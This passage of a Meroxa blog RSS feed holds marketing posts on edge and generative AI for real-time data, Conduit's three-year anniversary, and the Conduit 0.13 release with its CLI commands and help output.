&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/health-clinical-trials.png&quot; alt=&quot;health-clinical-trials.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Explanation:&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Patient Devices / Clinical Trial Sensors:&lt;/strong&gt; These include wearable devices and diagnostic machines that continuously generate health-related data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Edge Gateway:&lt;/strong&gt; Data is initially captured at the edge, reducing transmission delays.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Data Ingestion Platform:&lt;/strong&gt; Meroxa ingests and standardizes data from various devices, ensuring consistency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Pipeline:&lt;/strong&gt; The ingested data is processed in real time, enabling immediate analytics.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;On-Device Inference &amp;#x26; Analytics:&lt;/strong&gt; Local AI models analyze the data, offering prompt insights for patient monitoring and clinical decision-making.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud Analytics / Clinical Dashboards:&lt;/strong&gt; Processed insights are then aggregated and visualized on centralized dashboards for further analysis and regulatory reporting.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Manufacturing&lt;/h3&gt;
&lt;p&gt;In manufacturing environments, real-time data acquisition is critical for maintaining operational efficiency and safety. The following diagram demonstrates how Meroxa integrates with manufacturing processes:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/manufacturing-sensor.png&quot; alt=&quot;manufacturing-sensor.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Explanation:&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Manufacturing Equipment Sensors:&lt;/strong&gt; Sensors embedded in machinery generate continuous operational data (temperature, vibration, etc.).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Edge Data Aggregator:&lt;/strong&gt; Data from multiple sensors is collected at the edge, reducing latency and bandwidth use.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Data Ingestion:&lt;/strong&gt; The platform ingests aggregated data, standardizing it across various sources.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Pipeline:&lt;/strong&gt; Data is processed in real time to detect anomalies and trigger immediate responses.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;On-Device AI for Process Control:&lt;/strong&gt; Local AI models perform rapid analysis, enabling automated adjustments in machinery operation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Manufacturing Analytics Dashboard:&lt;/strong&gt; Insights are visualized on dashboards, allowing for proactive maintenance and process optimization.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Conclusion: Empowering the Future with Meroxa&lt;/h2&gt;
&lt;p&gt;Edge and on-device AI are no longer futuristic concepts—they are transforming the way industries operate today. By reducing latency through on-device inference, leveraging the power of specialized hardware, and deploying agile real-time data pipelines, organizations can unlock a new level of efficiency, safety, and innovation.&lt;/p&gt;
&lt;p&gt;Meroxa’s platform is not just about data capture; it’s about transforming that data into actionable insights, exactly when and where they are needed. For innovative companies seeking to drive competitive advantage and operational excellence, partnering with Meroxa means embracing a future where technology works seamlessly to empower every decision.&lt;/p&gt;
&lt;p&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[From Data to Decisions: How Generative AI is Transforming Business in Real-Time]]></title><description><![CDATA[ This blog explores how enterprises can leverage LLMs to extract instant value from continuous data streams and how conversational analytics is reshaping business intelligence. From financial services to retail, AI-powered data workflows are driving faster, smarter decisions—unlocking efficiency, scalability, and a strategic edge in a data-driven world.]]></description><link>https://meroxa.com/blog/from-data-to-decisions-how-generative-ai-is-transforming-business-in-real-time</link><guid isPermaLink="false">https://meroxa.com/blog/from-data-to-decisions-how-generative-ai-is-transforming-business-in-real-time</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 11 Feb 2025 15:53:00 GMT</pubDate><content:encoded>&lt;p&gt;At the current pace of this digital landscape, harnessing real-time data has become a game-changer for businesses. As the CEO of Meroxa, I&apos;ve witnessed firsthand how generative AI not only enhances data processing but fundamentally reshapes how organizations extract value from their continuous streams of information. Whether you&apos;re a mid-market enterprise or a Fortune 1000 company, embracing these technological advancements leads to transformative improvements in decision-making and operational efficiency. In this post, I&apos;ll explore how integrating large language models (LLMs) into data pipelines and leveraging conversational analytics are setting new standards for real-time applications.&lt;/p&gt;
&lt;h2&gt;Integrating LLMs into Real-Time Data Workflows&lt;/h2&gt;
&lt;h3&gt;The New Era of Data Pipelines&lt;/h3&gt;
&lt;p&gt;At its core, integrating LLMs into data workflows embeds intelligence throughout the data processing lifecycle—from ingestion to analysis. Traditional data pipelines focused on collecting and transforming data for batch processing. Now, with generative AI, organizations are shifting toward models that transform real-time data into actionable insights instantly.&lt;/p&gt;
&lt;p&gt;Consider a financial institution processing millions of transactions per minute. By incorporating a GPT-based LLM into its pipeline, the institution can automatically flag unusual patterns, assess risks in real time, and generate concise summaries of emerging market trends. This capability enhances operational agility while empowering decision-makers with immediate insights into potential risks and opportunities.&lt;/p&gt;
&lt;h3&gt;Real-World Example and Benefits&lt;/h3&gt;
&lt;p&gt;In retail—where consumer behavior and market sentiment shift rapidly—companies can integrate generative AI into streaming data feeds to monitor social media trends and point-of-sale transactions simultaneously. The LLM analyzes vast data volumes, creating real-time summaries that highlight changes in consumer preferences and emerging product trends. This enables marketing teams to quickly adjust campaigns while supply chain managers optimize inventory based on immediate demand signals.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Benefits:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Speed and Agility:&lt;/strong&gt; Real-time insights enable instant responses to emerging events.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resource Optimization:&lt;/strong&gt; Automated summarization frees skilled analysts to focus on strategic work.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability:&lt;/strong&gt; Modern AI models efficiently handle high-volume streaming data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved Accuracy:&lt;/strong&gt; Continuous model updates ensure insights stay timely and relevant.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Technical Workflow Diagram&lt;/h3&gt;
&lt;p&gt;Let me show you how a modern real-time data pipeline integrates LLMs using Meroxa for data ingestion and processing - this diagram breaks down the key components and how they work together:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/technical-workflow-diagram.png&quot; alt=&quot;technical-workflow-diagram.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Raw data flows from multiple sources through Meroxa&apos;s platform for ingestion and preprocessing, then through LLM analysis, finally generating automated insights for dashboards and alerts.&lt;/p&gt;
&lt;h3&gt;Challenges to Consider&lt;/h3&gt;
&lt;p&gt;While the benefits are significant, integrating LLMs into real-time pipelines comes with key challenges. Data quality is paramount—the system requires clean, consistent, and secure information to function effectively. Processing real-time data through large models demands substantial computational power. To address this, organizations need scalable infrastructure and may need to implement edge computing to reduce latency. Additionally, robust security and data governance protocols must protect sensitive information throughout its journey.&lt;/p&gt;
&lt;h2&gt;The Rise of Conversational Analytics&lt;/h2&gt;
&lt;h3&gt;From Dashboards to Dialogues&lt;/h3&gt;
&lt;p&gt;The business intelligence (BI) landscape is evolving. Traditional dashboards and static reports are giving way to conversational analytics platforms that let users interact with data through natural language queries. Instead of waiting for detailed reports, executives can now ask questions like &quot;What were our top-selling products last month, and what factors drove their success?&quot;—and receive immediate, context-rich responses powered by GPT-based foundation models.&lt;/p&gt;
&lt;h3&gt;Enhancing User Experience and Decision-Making&lt;/h3&gt;
&lt;p&gt;Conversational analytics democratizes data access across organizations. Advanced data analysis is no longer confined to technical teams—executives, managers, and frontline employees can now engage with data using everyday language. This accessibility speeds up decision-making by delivering insights promptly in a user-friendly format.&lt;/p&gt;
&lt;p&gt;Interactive, chat-like interfaces transform data interaction into a dynamic dialogue. This approach cultivates data literacy throughout the organization, preventing insights from being siloed within select groups. By removing technical barriers, businesses enable their entire workforce to participate in data-driven decision-making.&lt;/p&gt;
&lt;h3&gt;Technical Architecture for Conversational Analytics&lt;/h3&gt;
&lt;p&gt;In this architecture, a natural language query initiated by a user is processed by a conversational interface that leverages a GPT-based model. The query is then further refined and processed before data is retrieved and transformed by Meroxa’s real-time data store. This transformed data is used to generate an immediate, actionable response for the user.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/technical-architecture-for-conversational-analytics.png&quot; alt=&quot;Technical Architecture for Conversational Analytics.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Driving Business Value&lt;/h3&gt;
&lt;p&gt;For technical business decision-makers, the value proposition of conversational analytics is clear and compelling:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Enhanced Accessibility:&lt;/strong&gt; Natural language queries eliminate dependence on technical specialists, democratizing data insights across the organization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Faster Insights:&lt;/strong&gt; Real-time, interactive querying bridges the gap between data generation and action—essential in today&apos;s fast-moving markets.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cost Efficiency:&lt;/strong&gt; Automated analysis reduces the operational costs traditionally associated with BI systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Competitive Edge:&lt;/strong&gt; Organizations that quickly interpret and act on real-time data gain a decisive market advantage.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Strategic Implications for Business Leaders&lt;/h2&gt;
&lt;h3&gt;Embracing the Future Today&lt;/h3&gt;
&lt;p&gt;The integration of generative AI into real-time applications isn&apos;t just a technological trend—it&apos;s a strategic imperative. For technical business decision-makers, the ability to extract immediate, actionable insights from data streams drives revenue growth, enhances operational efficiency, and mitigates risks.&lt;/p&gt;
&lt;p&gt;At Meroxa, we empower organizations to seamlessly integrate these cutting-edge technologies into their existing data workflows. By connecting real-time data ingestion with AI-driven analytics, we help businesses unlock generative AI&apos;s full potential.&lt;/p&gt;
&lt;h3&gt;Overcoming Barriers and Building a Data-Driven Culture&lt;/h3&gt;
&lt;p&gt;While adopting generative AI presents challenges—from data quality to computational demands—the rewards far outweigh the investment. Enhanced decision-making, operational agility, and market competitiveness await organizations that commit to this transformation. Success hinges on fostering a culture that embraces data-driven insights and invests in the right infrastructure and talent.&lt;/p&gt;
&lt;p&gt;Whether you&apos;re just beginning your digital transformation or looking to accelerate it, now is the time to explore how generative AI can revolutionize your data strategy. The strategic advantages of streamlined data pipelines and intuitive analytics tools are undeniable.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;In today&apos;s world of constant change and endless data flows, generative AI in real-time applications isn&apos;t optional—it&apos;s essential. By combining LLMs with data pipelines and conversational analytics, businesses can achieve unprecedented levels of insight, efficiency, and agility. At Meroxa, we envision data not just as something to collect, but as a strategic asset that powers informed decisions and creates lasting competitive advantages.&lt;/p&gt;
&lt;p&gt;I urge technical business decision-makers, from mid-market enterprises to Fortune 1000 companies, to embrace these transformative technologies. This step will position your organization to not just succeed in a data-driven world, but to pioneer the next wave of business innovation.&lt;/p&gt;
&lt;p&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[🎉 Celebrating Three Years of Conduit: A Revolution in Real-Time Data Streaming!]]></title><description><![CDATA[As we mark the 3-year anniversary of Conduit Platform, we reflect on the incredible journey of innovation, scalability, and real-time data movement. Over the past three years, Conduit has transformed the way developers and data professionals build pipelines, enabling seamless data integration across diverse sources.  

In this blog, we’ll look back at our biggest milestones, customer success stories, and the groundbreaking features that set Conduit apart. From powering real-time analytics to AI-driven data processing, Conduit has continued to push the boundaries of what’s possible in modern data infrastructure.  

]]></description><link>https://meroxa.com/blog/celebrating-three-years-of-conduit-a-revolution-in-real-time-data-streaming</link><guid isPermaLink="false">https://meroxa.com/blog/celebrating-three-years-of-conduit-a-revolution-in-real-time-data-streaming</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Mon, 10 Feb 2025 12:30:00 GMT</pubDate><content:encoded>&lt;p&gt;✨ Three years ago, we set out to transform real-time data movement with &lt;strong&gt;Conduit&lt;/strong&gt;—a game-changer in the world of streaming technology! 💡 &lt;strong&gt;Ready to experience the power of real-time data?&lt;/strong&gt; &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Try Conduit today&lt;/a&gt; and start building your data pipelines!—a game-changer in the world of streaming technology! 💡 If you haven&apos;t yet, dive in now by exploring our &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;GitHub repository&lt;/a&gt; and joining our thriving &lt;a href=&quot;https://discord.gg/conduit&quot;&gt;community on Discord&lt;/a&gt;! 🌍 As we celebrate this milestone, we want to take a moment to reflect on why we built Conduit, express our deep appreciation for our incredible community, and highlight some key moments that have shaped our journey.&lt;/p&gt;
&lt;h4&gt;Why We Built Conduit&lt;/h4&gt;
&lt;p&gt;In today’s AI data-driven world, organizations need real-time data integration that is both scalable and easy to use. However, existing solutions often presented significant challenges—complex architectures, high costs, and lack of flexibility. We built &lt;strong&gt;Conduit&lt;/strong&gt; to address these gaps by offering a developer-friendly, open-source data streaming platform that is lightweight, flexible, and easy to deploy. Our vision is &lt;em&gt;&lt;strong&gt;“A world where real-time data is the default.”&lt;/strong&gt;&lt;/em&gt; Our mission is &lt;em&gt;&lt;strong&gt;“Enable anyone to leverage real-time data regardless of technical ability.”&lt;/strong&gt;&lt;/em&gt; Learn more about our vision &lt;a href=&quot;https://conduit.io/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h4&gt;Messages from the team&lt;/h4&gt;
&lt;p&gt;To mark this special occasion, we’re reflecting on our journey, sharing insights from our team, and celebrating the incredible support from our community. Hear from the Conduit team and discover how collaboration has fueled innovation in real-time data streaming.&lt;/p&gt;
&lt;p&gt;“Not every collaboration fuels innovation in the same way—after all, no two collaborations are alike. And let me be honest: for much of the time, we’re doing what most teams do—working across distant time zones, brainstorming, reviewing code, debating design documents, and holding sync meetings.&lt;/p&gt;
&lt;p&gt;What truly sets my team apart is the difference in how we handle our differences. Like any group, we sometimes clash with completely opposing views. Sometimes we push our opinions passionately; other times, we pragmatically decide that progress matters more than the perfect solution. And occasionally, we admit that, as much as we love our own ideas, someone else’s might be the better path forward. This honest exchange of thoughts keeps us continually improving while moving forward together.”
&lt;strong&gt;- Haris Osmanagić, Software Engineer&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;“I&apos;ve worked on Conduit since its infancy, watching it grow from a closed-source internal tool to a mature open-source project. Over the years, we&apos;ve faced many challenges—technical, organizational, and personal—but we&apos;ve always found a way through as a team. That&apos;s no surprise, given the team&apos;s talent and dedication. I&apos;m proud of what we&apos;ve achieved so far and excited for Conduit&apos;s future and growing community!”&lt;br&gt;
&lt;strong&gt;- Lovro Mažgon, Software Engineer&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;“Looking back on the last four years of developing Conduit, it’s been a remarkable journey to see how an idea has grown into a thriving open-source project celebrating its third birthday. Our globally distributed team is super collaborative and supportive, and we’re never afraid to bring new perspectives to the table or challenge each other.  I’m proud of the way we plan together, set clear goals, and consistently hit our milestones.&lt;/p&gt;
&lt;p&gt;As we prepare for the highly anticipated 1.0 release, I’m continuously reminded of how special this team is, the passion for innovation, and the commitment that we share. I’m also excited to see Conduit continue to grow and reach new heights, and can’t wait for the success we’ll achieve in the years to come.” - &lt;strong&gt;Maha Hajja, Software Engineeer&lt;/strong&gt;&lt;/p&gt;
&lt;h4&gt;A Huge Thank You to Our Amazing Community!&lt;/h4&gt;
&lt;p&gt;🚀 &lt;strong&gt;Join our growing ecosystem and be part of the real-time data revolution!&lt;/strong&gt; Contribute, share your feedback, and engage with fellow developers. &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Get involved on GitHub&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;From the very beginning, the &lt;strong&gt;Conduit&lt;/strong&gt; community has been the driving force behind its success. Your feedback, contributions, and enthusiasm have helped shape Conduit into what it is today. Companies such as &lt;a href=&quot;https://www.netflix.com/&quot;&gt;&lt;strong&gt;Netflix&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://www.uber.com/&quot;&gt;&lt;strong&gt;Uber&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://www.airbnb.com/&quot;&gt;&lt;strong&gt;Airbnb&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://www.google.com/&quot;&gt;&lt;strong&gt;Google&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://www.microsoft.com/&quot;&gt;&lt;strong&gt;Microsoft&lt;/strong&gt;&lt;/a&gt;, and &lt;a href=&quot;https://www.ibm.com/&quot;&gt;&lt;strong&gt;IBM&lt;/strong&gt;&lt;/a&gt; have starred our repository, reflecting the widespread trust and adoption of our platform. Check out our GitHub repository &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h4&gt;Key Community Milestones&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;First Commit:&lt;/strong&gt; Made by &lt;a href=&quot;https://github.com/jmar910&quot;&gt;@jmar910&lt;/a&gt; on January 19, 2022. View the commit &lt;a href=&quot;https://github.com/ConduitIO/conduit/commit/a162eef6876ff1d02898663a0f25f5568925f1ba&quot;&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;First Public PR Contribution:&lt;/strong&gt; &lt;a href=&quot;https://github.com/heath&quot;&gt;@heath&lt;/a&gt; submitted the first PR on January 21, 2022, improving documentation. See it &lt;a href=&quot;https://github.com/ConduitIO/conduit-site/pull/2&quot;&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;First Public Comment on Discord:&lt;/strong&gt; Heath left the first comment on January 21, 2022, reinforcing open-source collaboration. Join our Discord &lt;a href=&quot;https://discord.gg/conduit&quot;&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;First Community Connector Submission:&lt;/strong&gt; The first community connector &lt;strong&gt;Tiny Bird&lt;/strong&gt; was introduced on Oct 25, 2022. Details &lt;a href=&quot;https://github.com/alejandromav/conduit-connector-tinybird&quot;&gt;here.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Conduit&apos;s Evolution: Major Milestones &amp;#x26; Game-Changing Releases!&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.1.0&quot;&gt;Version 0.1.0&lt;/a&gt;: Laid the foundation for real-time data integration.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.6.0&quot;&gt;Version 0.6.0&lt;/a&gt;:  Introduced lifecycle events and improved metrics.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.7.0&quot;&gt;Version 0.7.0&lt;/a&gt;: Added Node.js support and schema registry updates.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.9.0&quot;&gt;Version 0.9.0&lt;/a&gt;: Major overhaul of processors and improved transformations.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.11.0&quot;&gt;Version 0.11.0&lt;/a&gt;: Comprehensive schema support and new connectors.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.12.0&quot;&gt;Version 0.12.0&lt;/a&gt;: Introduced Pipeline Recovery for resilient data streaming.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/changelog/2025-02-04-conduit-0-13-0-release&quot;&gt;Version 0.13.0&lt;/a&gt;: Celebrating 3 years with enhanced real-time collaboration and performance metrics.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Explore the full changelog &lt;a href=&quot;https://conduit.io/changelog&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h4&gt;Looking Ahead&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Want to shape the future of real-time data streaming?&lt;/strong&gt; Stay ahead with Conduit&apos;s latest developments and contribute to the next generation of data infrastructure. &lt;a href=&quot;https://conduit.io/&quot;&gt;Join us today&lt;/a&gt;!
We are more excited than ever about the future of Conduit.&lt;/p&gt;
&lt;p&gt;Our roadmap includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Improved scalability&lt;/li&gt;
&lt;li&gt;More out-of-the-box connectors&lt;/li&gt;
&lt;li&gt;Deeper AI-driven analytics&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Stay updated on our latest developments on our &lt;a href=&quot;https://meroxa.com/blog/&quot;&gt;blog&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;🙏 &lt;strong&gt;THANK YOU&lt;/strong&gt; to our users, contributors, and supporters! &lt;strong&gt;Don&apos;t just follow the data revolution—lead it!&lt;/strong&gt; Start using Conduit, share your success stories, and help us build the future of real-time streaming. Want to be part of our future? The time is NOW! 🌟 &lt;a href=&quot;https://conduit.io/&quot;&gt;Join the movement&lt;/a&gt; and help us shape the future of data streaming!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Here’s to the next chapter of Conduit!&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[New Release Conduit 0.13: Advanced Automation, New CLI, and 5x Performance Gains]]></title><description><![CDATA[The latest Conduit 0.13 release brings significant upgrades, focusing on developer experience, automation, and performance optimization. Key highlights include automated documentation synchronization for connectors, a powerful new CLI for seamless pipeline and connector management, and 5x improvements in output processing speed, reducing latency and boosting efficiency. Notably, this version also deprecates the built-in UI, reinforcing Conduit’s commitment to a CLI-driven workflow. With expanded CLI capabilities and automated documentation tools, developers can now manage data pipelines more efficiently than ever. Upgrade today to leverage these new features and maximize your real-time data processing capabilities! 🚀







]]></description><link>https://meroxa.com/blog/new-release-conduit-013-advanced-automation-new-cli-and-5x-performance-gains</link><guid isPermaLink="false">https://meroxa.com/blog/new-release-conduit-013-advanced-automation-new-cli-and-5x-performance-gains</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Fri, 07 Feb 2025 10:47:00 GMT</pubDate><content:encoded>&lt;p&gt;Conduit 0.13 is here, delivering major enhancements to &lt;strong&gt;developer experience, automation, and performance optimization&lt;/strong&gt;. This release focuses on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Automated documentation synchronization for connectors&lt;/strong&gt;, ensuring up-to-date and consistent documentation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A powerful new Conduit CLI&lt;/strong&gt;, providing fine-grained control over pipeline and connector management.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;5x output performance improvements&lt;/strong&gt;, drastically reducing processing latency and optimizing resource utilization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deprecation of the User Interface&lt;/strong&gt;, aligning with our focus on CLI-driven workflows.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Expanded CLI capabilities&lt;/strong&gt;, providing a more comprehensive command set for Conduit management.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s dive into the technical details of what’s new, why these changes matter, and how you can leverage them.&lt;/p&gt;
&lt;p&gt;🚀 &lt;strong&gt;Upgrade to Conduit 0.13 today!&lt;/strong&gt; Download the latest release and start building faster, more efficient pipelines. &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases&quot;&gt;Read the release notes&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;💡 &lt;strong&gt;Have questions?&lt;/strong&gt; Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord community&lt;/a&gt; and discuss with fellow developers!&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Deprecation of the User Interface&lt;/h2&gt;
&lt;p&gt;Conduit no longer includes a built-in User Interface. This decision aligns with our focus on providing a streamlined, command-line-centric workflow that better fits the needs of our users.&lt;/p&gt;
&lt;p&gt;For those seeking a graphical interface, the fully featured UI is available as part of the &lt;a href=&quot;https://conduit.io/platform&quot;&gt;Conduit Platform&lt;/a&gt;, our separate product offering designed to meet enterprise requirements.&lt;/p&gt;
&lt;p&gt;📢 &lt;strong&gt;Need a UI?&lt;/strong&gt; Explore the &lt;a href=&quot;https://conduit.io/platform&quot;&gt;Conduit Platform&lt;/a&gt; for a fully managed experience.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Expanded Command-Line Interface (CLI) Capabilities&lt;/h2&gt;
&lt;h3&gt;Why This Matters&lt;/h3&gt;
&lt;p&gt;The Conduit CLI has been enhanced to offer more &lt;strong&gt;comprehensive management capabilities&lt;/strong&gt;. By expanding available commands, we provide developers with a &lt;strong&gt;powerful toolset&lt;/strong&gt; for configuring and maintaining data pipelines.&lt;/p&gt;
&lt;h3&gt;How It Works&lt;/h3&gt;
&lt;p&gt;To run the Conduit service, simply execute:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit run
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Running the &lt;code class=&quot;language-text&quot;&gt;conduit&lt;/code&gt; command without arguments will display all available commands and options:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit
Conduit CLI is a command-line tool that helps you interact with and manage Conduit.

Usage:
  conduit [flags]
  conduit [command]

Available Commands:
  config            Shows the configuration to be used when running Conduit.
  connector-plugins Manage Connector Plugins
  connectors        Manage Conduit Connectors
  help              Help about any command
  init              Initialize Conduit with a configuration file and directories.
  open              Open in a web browser
  pipelines         Initialize and manage pipelines
  processor-plugins Manage Processor Plugins
  processors        Manage Processors
  run               Run Conduit
  version           Show the current version of Conduit.

Flags:
      --api.grpc.address string   address where Conduit is running
      --config.path string        path to the configuration file
  -h, --help                      help for conduit
  -v, --version                   show the current Conduit version

Use &quot;conduit [command] --help&quot; for more information about a command.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With these improvements, users can now execute all necessary Conduit operations &lt;strong&gt;seamlessly from the command line&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;⚡ &lt;strong&gt;Try it now!&lt;/strong&gt; Use &lt;code class=&quot;language-text&quot;&gt;$ conduit --help&lt;/code&gt; to explore all available commands.&lt;/p&gt;
&lt;p&gt;📖 &lt;strong&gt;New to Conduit?&lt;/strong&gt; Check out our &lt;a href=&quot;https://meroxa.com/blog/introducing-the-new-conduit-cli:-a-powerful-tool-for-managing-your-pipelines/&quot;&gt;blog&lt;/a&gt; for more detail to get started quickly!&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Automating Connector Documentation with &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;&lt;/h2&gt;
&lt;h3&gt;Why This Matters&lt;/h3&gt;
&lt;p&gt;Maintaining &lt;strong&gt;accurate, up-to-date documentation&lt;/strong&gt; for Conduit&apos;s extensive connector ecosystem has been a challenge. Manual updates to README files often lag behind code changes, leading to inconsistencies that can slow down development and debugging.&lt;/p&gt;
&lt;h3&gt;How We Solved It&lt;/h3&gt;
&lt;p&gt;Previously, each connector’s configuration was stored separately in README files, requiring &lt;strong&gt;manual updates&lt;/strong&gt; every time a configuration parameter changed. This approach was inefficient and error-prone. To address this, Conduit 0.13 introduces &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;&lt;/strong&gt;, a structured metadata file that centralizes all essential connector details and automates documentation synchronization.&lt;/p&gt;
&lt;p&gt;🛠 &lt;strong&gt;Start automating your connector documentation today!&lt;/strong&gt; Implement &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; in your repository and run the &lt;code class=&quot;language-text&quot;&gt;conn-sdk-cli readmegen&lt;/code&gt; command to ensure your documentation is always up to date.&lt;/p&gt;
&lt;p&gt;⚡ &lt;strong&gt;Try it now!&lt;/strong&gt; Run &lt;code class=&quot;language-text&quot;&gt;conn-sdk-cli readmegen&lt;/code&gt; to sync your documentation instantly.&lt;/p&gt;
&lt;p&gt;📘 &lt;strong&gt;Need help?&lt;/strong&gt; Follow our &lt;a href=&quot;https://conduit.io/docs/developing/connectors&quot;&gt;developer guide&lt;/a&gt; for best practices. Read more details in our &lt;a href=&quot;https://meroxa.com/blog/automating-documentation-for-100+-connectors/&quot;&gt;blog&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
